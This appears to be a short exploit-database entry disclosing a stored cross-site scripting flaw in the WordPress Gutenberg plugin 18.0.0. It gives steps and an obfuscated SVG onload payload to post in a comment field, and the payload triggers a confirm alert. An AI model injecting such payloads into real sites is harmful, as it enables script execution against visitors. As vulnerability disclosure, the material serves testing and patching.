Share
## https://sploitus.com/exploit?id=PACKETSTORM:177865
## Exploit Title: Wordpress Gutenberg Plugin Version 18.0.0 Stored XSS  
### Date: 2024-3-29  
### Exploit Author: tmrswrr  
### Category: Webapps  
### Vendor Homepage: https://wordpress.org/plugins/gutenberg/  
### Version 18.0.0  
  
  
1 ) Go to Gutenberg Plugin edit page : https://127.0.0.1/WordPress/2024/03/29/welcome-to-the-gutenberg-editor/#comment-4  
2 ) Write Leave a Reply place your payload :  
<sVg/onLy=1 onLoaD=confirm(1)//  
3 ) After save will be see alert button